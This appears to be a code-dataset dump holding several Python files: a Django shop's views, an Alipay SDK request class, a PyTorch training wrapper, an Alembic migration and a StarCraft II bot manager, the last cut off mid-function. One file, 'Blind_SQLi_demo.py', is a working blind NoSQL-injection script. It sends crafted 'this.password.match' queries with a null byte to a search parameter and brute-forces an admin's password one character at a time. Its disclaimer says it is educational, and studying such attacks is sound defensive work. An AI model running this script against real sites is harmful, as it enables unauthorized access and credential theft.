hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3d882ff63717c3ebe69686e1a7f5816476238d74
| 3,665 |
py
|
Python
|
Ecommerce/views.py
|
aryanshridhar/Ecommerce-Website
|
c582659e9b530555b9715ede7bb774c39f101c7e
|
[
"MIT"
] | 1 |
2020-06-01T16:41:33.000Z
|
2020-06-01T16:41:33.000Z
|
Ecommerce/views.py
|
aryanshridhar/Ecommerce-Website
|
c582659e9b530555b9715ede7bb774c39f101c7e
|
[
"MIT"
] | 4 |
2020-03-17T03:37:23.000Z
|
2021-09-22T18:36:18.000Z
|
Ecommerce/views.py
|
aryanshridhar/Ecommerce-Website
|
c582659e9b530555b9715ede7bb774c39f101c7e
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render , redirect
from django.contrib import messages
from django.http import HttpResponse
from .models import Product , Review , Cart
from .forms import ReviewForm
from django.contrib.auth.decorators import login_required
def homepage(request):
products = list(Product.objects.all())
desc_list = [products[i].desc for i in range(0,len(products))]
category = {products[i].category for i in range(len(products))}
length = list(map(len , desc_list))
items = {'pro' : products , 'number' : len(products) , 'category':category , 'length': length}
return render(request , 'Ecommerce/index.html' , items)
def checkout(request):
return HttpResponse('<h3>This page is under construction</h3>')
def productview(request , myid):
pressed_pro = list(Product.objects.filter(id=myid))[0]
incart = list(Cart.objects.filter(Item_id = myid))
username = None
if request.user.is_authenticated:
username = request.user
selected_review = list(filter(lambda item: item.for_product == pressed_pro , list(Review.objects.all())))
form = ReviewForm(request.POST or None)
if form.is_valid() and 'reviewbtn' in request.POST: #handling multiple forms
user_review = form.cleaned_data['Review']
model = Review(for_product = pressed_pro , Name = username , Review = user_review)
model.save()
messages.success(request , 'Your review has been posted successfully !')
return redirect(f'http://127.0.0.1:8000/Ecommerce/productview/{myid}') #handling multiple forms in a single page
if request.method == 'POST' and 'cartbtn' in request.POST:
if myid in Cart.objects.values_list('Item_id' , flat = True):
to_increase = list(Cart.objects.filter(Item_id = myid))[0]
to_increase.quantity += 1
to_increase.save()
else:
CartModel = Cart(Item = pressed_pro , foruser = username , quantity = 1 , price = pressed_pro.price)
CartModel.save()
messages.success(request , 'The item has been added to your cart , Check you cart <a href = "http://127.0.0.1:8000/Ecommerce/cart">here</a>')
return redirect(f'http://127.0.0.1:8000/Ecommerce/productview/{myid}')
if request.method == 'POST' and 'remove' in request.POST:
to_delete = list(Cart.objects.filter(Item_id = myid))[0]
to_delete.delete()
messages.success(request , f'{to_delete} has been removed from your cart')
return redirect(f'http://127.0.0.1:8000/Ecommerce/productview/{myid}')
item = {'pro': pressed_pro , 'form' : form , 'review' : selected_review, 'full_name' : username , 'incart' : incart}
return render(request , 'Ecommerce/productview.html' , item)
def products(request , value):
products = list(filter(lambda item: item.category == value , list(Product.objects.all())))
total_items = len(products)
context = {'name' : value , 'products' : products , 'total' : total_items}
return render(request , 'Ecommerce/products.html' , context)
@login_required(login_url = '/profile/login')
def cart(request):
current_user = request.user
total= sum(map(lambda x:x.quantity*x.price ,Cart.objects.filter(foruser = current_user)))
cart_products = list(zip(Cart.objects.filter(foruser = current_user) ,map(lambda x:x.quantity ,Cart.objects.filter(foruser = current_user)) , map(lambda x:x.quantity*x.price ,Cart.objects.filter(foruser = current_user))))
context = {'item' : cart_products , 'total' : total}
return render(request , 'Ecommerce/cart.html' , context)
def contact(request):
return render(request , 'Ecommerce/contact.html')
| 54.701493 | 225 | 0.688404 |
c37da082453be34af47d687e915e25ba787272d1
| 4,003 |
py
|
Python
|
alipay/aop/api/request/ZhimaCustomerEpIdentificationQueryRequest.py
|
snowxmas/alipay-sdk-python-all
|
96870ced60facd96c5bce18d19371720cbda3317
|
[
"Apache-2.0"
] | 213 |
2018-08-27T16:49:32.000Z
|
2021-12-29T04:34:12.000Z
|
alipay/aop/api/request/ZhimaCustomerEpIdentificationQueryRequest.py
|
snowxmas/alipay-sdk-python-all
|
96870ced60facd96c5bce18d19371720cbda3317
|
[
"Apache-2.0"
] | 29 |
2018-09-29T06:43:00.000Z
|
2021-09-02T03:27:32.000Z
|
alipay/aop/api/request/ZhimaCustomerEpIdentificationQueryRequest.py
|
snowxmas/alipay-sdk-python-all
|
96870ced60facd96c5bce18d19371720cbda3317
|
[
"Apache-2.0"
] | 59 |
2018-08-27T16:59:26.000Z
|
2022-03-25T10:08:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ZhimaCustomerEpIdentificationQueryModel import ZhimaCustomerEpIdentificationQueryModel
class ZhimaCustomerEpIdentificationQueryRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, ZhimaCustomerEpIdentificationQueryModel):
self._biz_content = value
else:
self._biz_content = ZhimaCustomerEpIdentificationQueryModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'zhima.customer.ep.identification.query'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
| 27.606897 | 148 | 0.647514 |
b508a18e28a3c46ec15030a3fc5702886ab1a004
| 6,113 |
py
|
Python
|
notebooks/test/preprocessing/neural_networks.py
|
Yu-Group/adaptive-wavelets
|
e67f726e741d83c94c3aee3ed97a772db4ce0bb3
|
[
"MIT"
] | 22 |
2021-02-13T05:22:13.000Z
|
2022-03-07T09:55:55.000Z
|
notebooks/test/preprocessing/neural_networks.py
|
Yu-Group/adaptive-wavelets
|
e67f726e741d83c94c3aee3ed97a772db4ce0bb3
|
[
"MIT"
] | null | null | null |
notebooks/test/preprocessing/neural_networks.py
|
Yu-Group/adaptive-wavelets
|
e67f726e741d83c94c3aee3ed97a772db4ce0bb3
|
[
"MIT"
] | 5 |
2021-12-11T13:43:19.000Z
|
2022-03-19T07:07:37.000Z
|
import torch
from torch import nn, optim
from torch.nn import functional as F
import numpy as np
from tqdm import tqdm
import torch.utils.data as data_utils
from features import downsample
import pickle as pkl
import models
class neural_net_sklearn():
"""
sklearn wrapper for training a neural net
"""
def __init__(self, D_in=40, H=40, p=17, epochs=1000, batch_size=100, track_name='X_same_length_normalized', arch='fcnn', torch_seed=2):
"""
Parameters:
==========================================================
D_in, H, p: int
same as input to FCNN
epochs: int
number of epochs
batch_size: int
batch size
track_name: str
column name of track (the tracks should be of the same length)
"""
torch.manual_seed(torch_seed)
self.D_in = D_in
self.H = H
self.p = p
self.epochs = epochs
self.batch_size = batch_size
self.track_name = track_name
self.torch_seed = torch_seed
self.arch = arch
torch.manual_seed(self.torch_seed)
if self.arch == 'fcnn':
self.model = models.FCNN(self.D_in, self.H, self.p)
elif 'lstm' in self.arch:
self.model = models.LSTMNet(self.D_in, self.H, self.p)
elif 'cnn' in self.arch:
self.model = models.CNN(self.D_in, self.H, self.p)
elif 'attention' in self.arch:
self.model = models.AttentionNet(self.D_in, self.H, self.p)
elif 'video' in self.arch:
self.model = models.VideoNet()
def fit(self, X, y, verbose=False, checkpoint_fname=None, device='cpu'):
"""
Train model
Parameters:
==========================================================
X: pd.DataFrame
input data, should contain tracks and additional covariates
y: np.array
input response
"""
torch.manual_seed(self.torch_seed)
if self.arch == 'fcnn':
self.model = models.FCNN(self.D_in, self.H, self.p)
elif 'lstm' in self.arch:
self.model = models.LSTMNet(self.D_in, self.H, self.p)
elif 'cnn' in self.arch:
self.model = models.CNN(self.D_in, self.H, self.p)
elif 'attention' in self.arch:
self.model = models.AttentionNet(self.D_in, self.H, self.p)
elif 'video' in self.arch:
self.model = models.VideoNet()
# convert input dataframe to tensors
X_track = X[self.track_name] # track
X_track = torch.tensor(np.array(list(X_track.values)), dtype=torch.float)
if len(X.columns) > 1: # covariates
X_covariates = X[[c for c in X.columns if c != self.track_name]]
X_covariates = torch.tensor(np.array(X_covariates).astype(float), dtype=torch.float)
else:
X_covariates = None
# response
y = torch.tensor(y.reshape(-1, 1), dtype=torch.float)
# initialize optimizer
optimizer = optim.Adam(self.model.parameters(), lr=0.001)
# initialize dataloader
if X_covariates is not None:
dataset = torch.utils.data.TensorDataset(X_track, X_covariates, y)
else:
dataset = torch.utils.data.TensorDataset(X_track, y)
train_loader = torch.utils.data.DataLoader(dataset,
batch_size=self.batch_size,
shuffle=True)
#train_loader = [(X1, X2, y)]
# train fcnn
print('fitting dnn...')
self.model = self.model.to(device)
for epoch in tqdm(range(self.epochs)):
train_loss = 0
for batch_idx, data in enumerate(train_loader):
optimizer.zero_grad()
# print('shapes input', data[0].shape, data[1].shape)
if X_covariates is not None:
preds = self.model(data[0].to(device), data[1].to(device))
y = data[2].to(device)
else:
preds = self.model(data[0].to(device))
y = data[1].to(device)
loss_fn = torch.nn.MSELoss()
loss = loss_fn(preds, y)
loss.backward()
train_loss += loss.item()
optimizer.step()
if verbose:
print(f'Epoch: {epoch}, Average loss: {train_loss/len(X_track):.4e}')
elif epoch % (self.epochs // 10) == 99:
print(f'Epoch: {epoch}, Average loss: {train_loss/len(X_track):.4e}')
if checkpoint_fname is not None:
pkl.dump({'model_state_dict': self.model.state_dict()},
open(checkpoint_fname, 'wb'))
def predict(self, X_new):
"""
make predictions with new data
Parameters:
==========================================================
X_new: pd.DataFrame
input new data, should contain tracks and additional covariates
"""
self.model.eval()
with torch.no_grad():
# convert input dataframe to tensors
X_new_track = X_new[self.track_name]
X_new_track = torch.tensor(np.array(list(X_new_track.values)), dtype=torch.float)
if len(X_new.columns) > 1:
X_new_covariates = X_new[[c for c in X_new.columns if c != self.track_name]]
X_new_covariates = torch.tensor(np.array(X_new_covariates).astype(float), dtype=torch.float)
preds = self.model(X_new_track, X_new_covariates)
else:
preds = self.model(X_new_track)
return preds.data.numpy().reshape(1, -1)[0]
| 37.503067 | 139 | 0.515786 |
d3073477b3fd056b1a524ccc950c681675170f7a
| 1,360 |
py
|
Python
|
migrations/versions/4965ed66d657_initial_migration.py
|
danielmuthama/P_Blog
|
0712678328d5270e266fef530462630a57c546cd
|
[
"MIT"
] | 1 |
2022-03-24T06:47:07.000Z
|
2022-03-24T06:47:07.000Z
|
migrations/versions/4965ed66d657_initial_migration.py
|
danielmuthama/P_Blog
|
0712678328d5270e266fef530462630a57c546cd
|
[
"MIT"
] | null | null | null |
migrations/versions/4965ed66d657_initial_migration.py
|
danielmuthama/P_Blog
|
0712678328d5270e266fef530462630a57c546cd
|
[
"MIT"
] | null | null | null |
"""Initial Migration
Revision ID: 4965ed66d657
Revises: ee5a4f1305d0
Create Date: 2021-09-27 12:37:39.345275
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '4965ed66d657'
down_revision = 'ee5a4f1305d0'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('blog',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('blogtitle', sa.String(length=255), nullable=True),
sa.Column('myblog', sa.String(), nullable=True),
sa.Column('postdate', sa.DateTime(), nullable=True),
sa.Column('author', sa.String(length=255), nullable=True),
sa.Column('category', sa.String(length=255), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('votes',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('blog_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['blog_id'], ['blog.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('votes')
op.drop_table('blog')
# ### end Alembic commands ###
| 29.565217 | 65 | 0.666912 |
4bc02ca7ee4055a6a928ea77a9e7c56d2e8fd8df
| 4,452 |
py
|
Python
|
Blind_SQLi_demo.py
|
KirinFuji/PentestSnips
|
a4e6818673f4629ccf6842617f123c63956206f0
|
[
"MIT"
] | null | null | null |
Blind_SQLi_demo.py
|
KirinFuji/PentestSnips
|
a4e6818673f4629ccf6842617f123c63956206f0
|
[
"MIT"
] | null | null | null |
Blind_SQLi_demo.py
|
KirinFuji/PentestSnips
|
a4e6818673f4629ccf6842617f123c63956206f0
|
[
"MIT"
] | null | null | null |
# Written by github.com/KirinFuji
"""
MIT License
Copyright (c) 2021 KirinFuji@users.noreply.github.com
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
# Disclaimer: DO NOT use this for malicious purposes, this is for purely educational purposes as a sample of how
# a hacker may abuse a Blind SQLi vulnerability to steal a users password.
# Simple Blind SQLi script
from abc import ABC
import aiohttp
import asyncio
import re
import urllib.parse
from html.parser import HTMLParser
from string import ascii_lowercase
class MyHTMLParser(HTMLParser, ABC):
def __init__(self, username):
HTMLParser.__init__(self)
self.user_found = False
self.username = username
# Parser will need to be modified depending on the webserver
def handle_data(self, data):
data = re.sub(r'\s+', ' ', data)
if data != ' ':
if data == self.username:
self.user_found = True
class BruteForce:
def __init__(self, website, parameter, chars_, user):
self.user_search = user
self.website = website
self.parameter = parameter
self.parser = MyHTMLParser(self.user_search)
self.chars = chars_
self.delay = 0.2
self.session = None
async def web_request(self, url):
async with self.session.get(url) as resp:
text = await resp.text()
return text
def create_request(self, pattern):
# Parameter vulnerable to SQLi
site = self.website + self.parameter
# SQL/NoSQL query to inject
query = rf"{self.user_search}' && this.password.match(/{pattern}/)"
# URL Encode the request
encoded_query = urllib.parse.quote(query)
# Combine it and add null byte
return site + encoded_query + '%00'
async def find_next_char(self, password):
for char in self.chars:
# Reset Parser
self.parser.user_found = False
# Create full encoded URL to request
request = self.create_request(f'^{password + str(char)}.*$')
print(f'GET: {request}')
# Send the request
result = await self.web_request(request)
# Parse the HTML looking for username
self.parser.feed(result)
if self.parser.user_found:
# Append the discovered character to the password
password += str(char)
print(f'Pass: {password}')
return password
await asyncio.sleep(self.delay)
return None
async def brute_force(self):
password = ''
async with aiohttp.ClientSession() as session:
self.session = session
while not self.session.closed:
result = await self.find_next_char(password)
# If no new character was found, end loop, else check for next character
if result is None:
break
else:
password = result
await self.session.close()
self.session = None
return f'Final: {password}'
if __name__ == '__main__':
chars = '-0123456789'
chars += ascii_lowercase
# Website, Vulnerable Parameter, chars to check for, brute forcing password for this user
Brute = BruteForce('http://example.com/?', 'search=', chars, 'admin')
Brute.delay = 0.1
finished = asyncio.run(Brute.brute_force())
print(finished)
| 36.195122 | 112 | 0.655436 |
e0f53805ab2f5ea01cd2f18208750b866d690319
| 15,976 |
py
|
Python
|
bot/logic/unit_manager/unit_manager.py
|
Scottdecat/HiveMind
|
cbd9de0645d756a63d65918f6c971753e1178652
|
[
"MIT"
] | null | null | null |
bot/logic/unit_manager/unit_manager.py
|
Scottdecat/HiveMind
|
cbd9de0645d756a63d65918f6c971753e1178652
|
[
"MIT"
] | null | null | null |
bot/logic/unit_manager/unit_manager.py
|
Scottdecat/HiveMind
|
cbd9de0645d756a63d65918f6c971753e1178652
|
[
"MIT"
] | null | null | null |
import math
import random
from collections import defaultdict
from math import sqrt
from typing import Union
import bot.injector as injector
from bot.logic.army_strategy_manager.army_strategy_manager_interface import \
ArmyStrategyManagerInterface
from bot.logic.overlord_manager import OverlordManager
from bot.logic.queen_manager.default_queen_manager import DefaultQueenManager
from bot.logic.spending_actions.default_spending_actions import \
DefaultSpendingActions
from bot.logic.unit_manager.priority_calculations import (
enemy_group_priority, unit_desperation_threshold, unit_to_group_priority)
from bot.model.unit_type_abstraction import UnitTypeAbstraction
from bot.services.action_service import ActionService
from bot.services.debug_service import DebugService
from bot.services.state_service import StateService
from bot.services.unit_group_service import UnitGroup, UnitGroupService
from bot.services.unit_type_service import UnitTypeService
from bot.util.mapping_functions import steep_decline
from bot.util.priority_queue import PriorityQueue
from bot.util.unit_type_utils import get_unit_origin_type, is_combat_unit
from sc2 import AbilityId, UnitTypeId
from sc2.position import Point3, Rect
from sc2.unit import Unit
from sc2.units import Units
from .assigned_group import AssignedGroup
from .group_tactics import GroupTactics, distance_from_boundary
from .micro import Micro
from .worker_distribution import WorkerDistributor
class UnitManager:
def __init__(self):
self.state: StateService = injector.inject(StateService)
self.debug_service: DebugService = injector.inject(DebugService)
self.group_service: UnitGroupService = injector.inject(UnitGroupService)
self.action_service: ActionService = injector.inject(ActionService)
self.unit_type: UnitTypeService = injector.inject(UnitTypeService)
self.group_tactics: GroupTactics = GroupTactics()
self.micro: Micro = Micro()
self.worker_distributor: WorkerDistributor = WorkerDistributor()
self.spending_actions = DefaultSpendingActions()
self.overlord_manager = OverlordManager()
self.queen_manager = DefaultQueenManager()
self.assigned_groups = []
self.previously_assigned_units = {}
self.proxy_scouts: Units = Units([])
self.proxy_scout_idx: int = 0
self.expansion_locations: list = []
def on_init(self) -> None:
expansion_locations = list(self.state._bot.expansion_locations.keys())
expansion_locations.append(self.state._bot.enemy_start_locations[0])
expansion_locations.sort(key=lambda p: p.distance_to(self.state._bot.enemy_start_locations[0]))
self.expansion_locations = expansion_locations
async def on_step(self):
unassigned = self.state.own_units
enemy_groups: PriorityQueue = self.state.enemy_groups
self.assigned_groups = self.assign_groups(unassigned, enemy_groups)
builder_units: Units = self.get_builder_units(unassigned, self.state.enemy_groups)
assigned_tags = set()
for g in self.assigned_groups:
assigned_tags = assigned_tags.union(self.group_tactics.manage_group(g))
await self.micro.micro_units(g.group.units, assigned_tags)
unassigned = unassigned.tags_not_in(assigned_tags)
a = await self.spending_actions.build(self.state.build_queue, builder_units)
unassigned = unassigned.tags_not_in(a.tags)
# saturate remaining workers
unassigned_workers = unassigned({UnitTypeId.DRONE, UnitTypeId.SCV, UnitTypeId.PROBE, UnitTypeId.MULE})
self.worker_distributor.distribute_workers(unassigned_workers)
unassigned = unassigned.tags_not_in(unassigned_workers.tags)
unassigned_overlords = unassigned({UnitTypeId.OVERLORD, UnitTypeId.OVERSEER})
await self.overlord_manager.on_step(unassigned_overlords)
unassigned = unassigned.tags_not_in(unassigned_overlords.tags)
unassigned_queens = unassigned({UnitTypeId.QUEEN})
unassigned = unassigned.tags_not_in(await self.queen_manager.on_step(unassigned_queens))
# use remaining units to do cool things
# scout enemy bases with idle units
#TODO ideally, should only reassign idle proxy scouts. However, can't really figure out how to get that working, so just putting this hack for now.
if unassigned.exists:
to_remove = set()
for s in self.proxy_scouts:
s: Unit
tag = s.tag
s = self.state.own_units.find_by_tag(s.tag)
if not s or s.tag not in unassigned.tags or s.is_idle:
to_remove.add(tag)
self.proxy_scouts = self.proxy_scouts.tags_not_in(to_remove)
missing_scouts = 4 - self.proxy_scouts.amount
new_scouts = unassigned({UnitTypeId.ZERGLING, UnitTypeId.ROACH}).sorted(lambda u: u.movement_speed, reverse=True).take(missing_scouts, require_all=False)
for scout in new_scouts:
scout: Unit
self.action_service.add(scout.tag, scout.move(random.choice(self.expansion_locations)))
self.proxy_scouts.append(scout)
unassigned = unassigned.tags_not_in(self.proxy_scouts.tags)
'''
if (int(self.state.getTimeInSeconds()) % 15) == 0:
self.reassign_proxy_scouts()
num_scouting_units = 4
if self.proxy_scouts.amount < num_scouting_units and self.state.mode == 'defend':
unassigned_scouts = unassigned.filter(self.is_scout)
unassigned_scouts = unassigned_scouts.sorted(lambda u: u.movement_speed, reverse=True).take(num_scouting_units - self.proxy_scouts.amount, require_all=False)
self.append_proxy_scouts(unassigned_scouts)
elif self.state.mode == 'attack':
unassigned_scouts = unassigned.filter(self.is_scout)
self.append_proxy_scouts(unassigned_scouts)
unassigned = unassigned.tags_not_in(self.proxy_scouts.tags)
'''
# idle position at nearest base
for unit in unassigned:
unit: Unit
if unit.movement_speed > 0 and unit.type_id not in {UnitTypeId.OVERLORD, UnitTypeId.LARVA}:
pos = unit.position.closest(self.state.own_townhalls).position
if unit.distance_to(pos) < 10:
self.action_service.add(unit.tag, unit.attack(pos))
else:
self.action_service.add(unit.tag, unit.move(pos))
self.debug_service.text_world(f'IDLE', unit.position3d, None, 16)
def priority_apply_unit_modifier(self, priority, enemy_group: UnitGroup, unit: Unit):
if enemy_group.range_hull:
dist = distance_from_boundary(enemy_group.range_hull, unit.position)
else:
dist = unit.position.distance_to(enemy_group.location)
dist = min(self.state.map_diagonal_len, max(0, dist))
dist_mod = dist / self.state.map_diagonal_len
dist_mod = (0.5 + steep_decline(dist_mod)) ** 2
# increase priority by if unit was assigned to this group in the last iteration
percentage_of_previously_assigned = 0
if unit.tag in self.previously_assigned_units:
intersection = enemy_group.units.tags.intersection(self.previously_assigned_units[unit.tag])
percentage_of_previously_assigned = len(intersection) / len(enemy_group.units.tags)
prev_mod = 1 + percentage_of_previously_assigned
return priority * dist_mod * prev_mod
class Temp:
units: Units
value = 0
ground_value = 0
air_value = 0
cloak = 0
retreaters: Units
def unit_activation_function(self, unit: Unit, priority, enemy_group: UnitGroup, oversaturation = 0):
if unit.type_id == UnitTypeId.DRONE:
return priority > 0.1 and enemy_group.units.exclude_type(UnitTypeId.REAPER).exists and (oversaturation == 0 and (
(
unit.distance_to(enemy_group.units.center) < 15
and (self.state.own_townhalls.exists
and (unit.distance_to(self.state.own_townhalls.closest_to(enemy_group.location).position) < 20))
)
or (enemy_group.location.distance_to(self.state.own_natural_position) < 10)
or (
enemy_group.units({UnitTypeId.PHOTONCANNON, UnitTypeId.PYLON}).exists
and enemy_group.location.distance_to_closest(self.state.own_townhalls) < 20
))
) or (
enemy_group.value > 100
and enemy_group.units.exclude_type({UnitTypeId.SCV, UnitTypeId.PROBE, UnitTypeId.DRONE}).exists
and enemy_group.range_hull
and distance_from_boundary(enemy_group.range_hull, unit.position) <= 1
and unit.position.distance_to_closest(self.state.own_townhalls) < 15
)
elif unit.type_id == UnitTypeId.QUEEN:
return priority > 0 and (enemy_group.location.distance_to_closest(self.state.own_townhalls.ready) < 20 or (self.state._bot.has_creep(enemy_group.location) and enemy_group.location.distance_to_closest(self.state.own_townhalls.ready) < 30))
elif unit.type_id in {UnitTypeId.CHANGELING, UnitTypeId.CHANGELINGMARINE, UnitTypeId.CHANGELINGMARINESHIELD, UnitTypeId.CHANGELINGZEALOT, UnitTypeId.CHANGELINGZERGLING, UnitTypeId.CHANGELINGZERGLINGWINGS}:
return False
elif unit.type_id == UnitTypeId.OVERSEER:
return enemy_group.cloak_value > 0
else:
return priority > 0
def assign_groups(self, unassigned: Units, priorities: PriorityQueue):
groups = []
units = unassigned.not_structure.filter(is_combat_unit)
d = {}
for enemy_group in priorities:
t = self.Temp()
t.units = Units([])
t.retreaters = Units([])
d[enemy_group] = t
#assign army units
unit_to_priorities = defaultdict(PriorityQueue)
for unit in units:
for p in priorities.iterate2():
priority = self.priority_apply_unit_modifier(p[1], p[0], unit)
unit_to_priorities[unit].enqueue(p[0], priority)
#sort units so that those who have a very high priority for the first enemy group
#and low priority for the rest are assigned first
def sort_by_diff(unit: Unit):
s = 0
if not unit_to_priorities[unit].isEmpty():
prio = unit_to_priorities[unit].peek2()
enemy_group = prio[0]
priority = prio[1]
percentage_of_previously_assigned = 0
if unit.tag in self.previously_assigned_units:
intersection = enemy_group.units.tags.intersection(self.previously_assigned_units[unit.tag])
percentage_of_previously_assigned = len(intersection) / len(enemy_group.units.tags)
s = 0.5 + (percentage_of_previously_assigned / 2) * priority
return s
if not priorities.isEmpty():
units = units.sorted(sort_by_diff, True)
##
for unit in units:
unit: Unit
sorted_enemy_groups = PriorityQueue()
for p in unit_to_priorities[unit].iterate2():
priority = p[1]
own_val = d[p[0]].value
enemy_val = p[0].value
#should_fight, val = self.group_tactics.evaluate_engagement(d[p[0]], p[0], show_group_vals=True)
#own_val, enemy_val = val
# dont send lings vs voidrays
if not unit.can_attack_air:
# TODO performance: dont recalculate for every unit
priority -= p[0].percentage_of_air_in_group * priority
# group oversaturation
oversaturation = 0
if own_val >= enemy_val:
diff = own_val - enemy_val
oversaturation = max(0.01, diff / (enemy_val if enemy_val else 1))
mult = max(0.01, 1 - oversaturation)
priority *= 0.5 + (mult / 2)
if self.unit_activation_function(unit, priority, p[0], oversaturation):
sorted_enemy_groups.enqueue(p[0], priority)
if sorted_enemy_groups.isEmpty():
continue
enemy_group: UnitGroup = sorted_enemy_groups.peek()
self.debug_service.text_world(f'{round(sorted_enemy_groups.peek2()[1],2)}', Point3((unit.position3d.x, unit.position3d.y - 0.35, unit.position3d.z)), Point3((0, 255, 0)), 12)
if (not unit.can_attack_air and enemy_group.percentage_of_air_in_group > 0.8) or (unit.type_id in {UnitTypeId.DRONE} and d[enemy_group].value > enemy_group.value):
d[enemy_group].retreaters.append(unit)
else:
d[enemy_group].units.append(unit)
# TODO consider cloak values
d[enemy_group].value += self.unit_type.get_unit_combat_value_enemy_group(unit.type_id, enemy_group.units) * sum(self.unit_type.get_resource_value(unit.type_id))
self.previously_assigned_units = {}
for key, value in d.items():
a = AssignedGroup()
a.enemies = key
a.group = self.group_service.create_group(value.units)
a.retreaters = self.group_service.create_group(value.retreaters)
groups.append(a)
for unit in a.group.units:
self.previously_assigned_units[unit.tag] = a.enemies.units.tags
return groups
def get_builder_units(self, own_units: Units, enemy_groups: PriorityQueue) -> {'unit tags'}:
'''Determines if any units in own group are in the ideal conditions to build into a different unit.
Returns all units that can build.'''
origins_build_queue = {get_unit_origin_type(unit_id) for unit_id in self.state.build_queue}.union({UnitTypeId.DRONE, UnitTypeId.PROBE, UnitTypeId.SCV})
return own_units.of_type(origins_build_queue)
def append_proxy_scouts(self, own_units : Units) -> None:
'''Will append a unit even if that unit is already in self.proxy_scouts, so be careful!'''
for unit in own_units:
self.give_scouting_order(unit)
self.proxy_scouts.append(unit)
def give_scouting_order(self, scout: Unit) -> None:
